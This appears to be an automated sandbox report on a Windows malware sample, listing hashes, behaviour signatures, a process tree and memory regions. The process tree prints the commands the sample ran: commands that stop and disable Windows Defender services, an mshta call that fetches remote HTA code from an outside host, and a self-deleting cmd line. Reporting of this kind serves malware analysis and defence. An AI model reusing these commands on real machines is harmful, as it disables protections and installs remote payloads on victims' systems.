Overview

overview

10

Static

static

3

4675d8b411...18.exe

windows7-x64

10

4675d8b411...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    14-07-2024 15:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe

  • Size

    2.5MB

  • MD5

    4675d8b4117bc31e84521883391cc9f3

  • SHA1

    88ca0a53d039c9160606b21b2018f62f6165d943

  • SHA256

    0a76c32c7b8958250919ac8668c6d9fe7c9d2ddc360f87b2fa8afe0108d709d5

  • SHA512

    944681751aea86766e90ded22d08cf39042c21772955b49945ac7d2cace6531b775111987a94c4b7fd60a0380639d991f033f3a3a234cc32b06e534717b57997

  • SSDEEP

    49152:ODxcr+qkQUHgYvPGenqfWrb6VKQ4VDEIMnAuAlLYAzpL528s35:ODx0NsTH6fW3Q8DEIMAuAlLYAzpdbsp

Score
10/10
evasionexecutionpersistence

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://soft-store-inc.com/soft-usage/favicon.ico?0=1200&1=RPXOCQRF&2=i-s&3=74&4=7601&5=6&6=1&7=99600&8=1033

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 16 IoCs
    persistence
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Launches sc.exe 6 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\4675d8b4117bc31e84521883391cc9f3_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2976
    • C:\Windows\SysWOW64\sc.exe
      sc stop WinDefend
      2⤵
      • Launches sc.exe
      PID:2744
    • C:\Windows\SysWOW64\sc.exe
      sc config WinDefend start= disabled
      2⤵
      • Launches sc.exe
      PID:2708
    • C:\Windows\SysWOW64\net.exe
      net stop msmpsvc
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop msmpsvc
        3⤵
          PID:2552
      • C:\Windows\SysWOW64\sc.exe
        sc config msmpsvc start= disabled
        2⤵
        • Launches sc.exe
        PID:2172
      • C:\Users\Admin\AppData\Roaming\Microsoft\qarqpv.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\qarqpv.exe
        2⤵
        • Modifies WinLogon for persistence
        • Event Triggered Execution: Image File Execution Options Injection
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2640
        • C:\Windows\SysWOW64\sc.exe
          sc stop WinDefend
          3⤵
          • Launches sc.exe
          PID:2720
        • C:\Windows\SysWOW64\sc.exe
          sc config WinDefend start= disabled
          3⤵
          • Launches sc.exe
          PID:1924
        • C:\Windows\SysWOW64\net.exe
          net stop msmpsvc
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:560
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop msmpsvc
            4⤵
              PID:1276
          • C:\Windows\SysWOW64\sc.exe
            sc config msmpsvc start= disabled
            3⤵
            • Launches sc.exe
            PID:2012
          • C:\Windows\SysWOW64\mshta.exe
            mshta.exe "http://soft-store-inc.com/soft-usage/favicon.ico?0=1200&1=RPXOCQRF&2=i-s&3=74&4=7601&5=6&6=1&7=99600&8=1033"
            3⤵
            • Modifies Internet Explorer settings
            PID:2828
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\4675D8~1.EXE" >> NUL
          2⤵
          • Deletes itself
          PID:2776

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • \Users\Admin\AppData\Roaming\Microsoft\qarqpv.exe
        Filesize

        2.5MB

        MD5

        4675d8b4117bc31e84521883391cc9f3

        SHA1

        88ca0a53d039c9160606b21b2018f62f6165d943

        SHA256

        0a76c32c7b8958250919ac8668c6d9fe7c9d2ddc360f87b2fa8afe0108d709d5

        SHA512

        944681751aea86766e90ded22d08cf39042c21772955b49945ac7d2cace6531b775111987a94c4b7fd60a0380639d991f033f3a3a234cc32b06e534717b57997

        Download Submit

      • memory/2640-66-0x0000000000400000-0x00000000008D4000-memory.dmp

        Filesize

        4.8MB

        Download

      • memory/2640-67-0x0000000000400000-0x00000000008D4000-memory.dmp

        Filesize

        4.8MB

        Download

      • memory/2976-0-0x0000000000400000-0x00000000008D4000-memory.dmp

        Filesize

        4.8MB

        Download

      • memory/2976-1-0x0000000000960000-0x00000000009BA000-memory.dmp

        Filesize

        360KB

        Download

      • memory/2976-2-0x0000000000270000-0x0000000000271000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-9-0x0000000003500000-0x0000000003501000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-8-0x00000000003B0000-0x00000000003B1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-7-0x0000000000350000-0x0000000000351000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-6-0x00000000003A0000-0x00000000003A1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-5-0x00000000002A0000-0x00000000002A1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-4-0x0000000000250000-0x0000000000251000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-3-0x0000000000260000-0x0000000000261000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-39-0x0000000003500000-0x0000000003501000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-44-0x00000000034F0000-0x00000000034F1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-43-0x00000000034F0000-0x00000000034F1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-42-0x0000000000910000-0x0000000000911000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-41-0x00000000034F0000-0x00000000034F1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-40-0x0000000003500000-0x0000000003501000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-38-0x0000000003500000-0x0000000003501000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-37-0x0000000003500000-0x0000000003501000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-36-0x0000000003500000-0x0000000003501000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-35-0x00000000023B0000-0x00000000023B1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-34-0x0000000003500000-0x0000000003501000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-33-0x00000000023D0000-0x00000000023D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-32-0x00000000023A0000-0x00000000023A1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-31-0x0000000002360000-0x0000000002361000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-30-0x0000000002370000-0x0000000002371000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-29-0x0000000002380000-0x0000000002381000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-28-0x00000000034F0000-0x00000000034F1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-27-0x0000000000C70000-0x0000000000C71000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-26-0x00000000008F0000-0x00000000008F1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-25-0x00000000009C0000-0x00000000009C1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-24-0x00000000003D0000-0x00000000003D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-23-0x00000000003E0000-0x00000000003E1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-22-0x00000000003F0000-0x00000000003F1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-21-0x00000000034F0000-0x00000000034F1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-20-0x00000000034F0000-0x00000000034F1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-19-0x00000000034F0000-0x00000000034F1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-18-0x0000000003500000-0x0000000003501000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-17-0x0000000003500000-0x0000000003501000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-16-0x0000000003500000-0x0000000003501000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-15-0x0000000003500000-0x0000000003501000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-14-0x0000000003500000-0x0000000003501000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-13-0x0000000003500000-0x0000000003501000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-12-0x0000000003500000-0x0000000003501000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-11-0x0000000000330000-0x0000000000331000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-10-0x0000000003500000-0x0000000003501000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-51-0x0000000000230000-0x0000000000231000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-50-0x0000000003500000-0x0000000003501000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-49-0x0000000003540000-0x0000000003541000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-48-0x0000000003510000-0x0000000003511000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-47-0x0000000000220000-0x0000000000221000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2976-46-0x00000000034E0000-0x00000000034E3000-memory.dmp

        Filesize

        12KB

        Download

      • memory/2976-45-0x00000000034F0000-0x00000000034F3000-memory.dmp

        Filesize

        12KB

        Download

      • memory/2976-61-0x00000000048D0000-0x0000000004DA4000-memory.dmp

        Filesize

        4.8MB

        Download

      • memory/2976-63-0x0000000000960000-0x00000000009BA000-memory.dmp

        Filesize

        360KB

        Download

      • memory/2976-64-0x0000000000400000-0x00000000008D4000-memory.dmp

        Filesize

        4.8MB

        Download

      • memory/2976-59-0x0000000000400000-0x00000000008D4000-memory.dmp

        Filesize

        4.8MB

        Download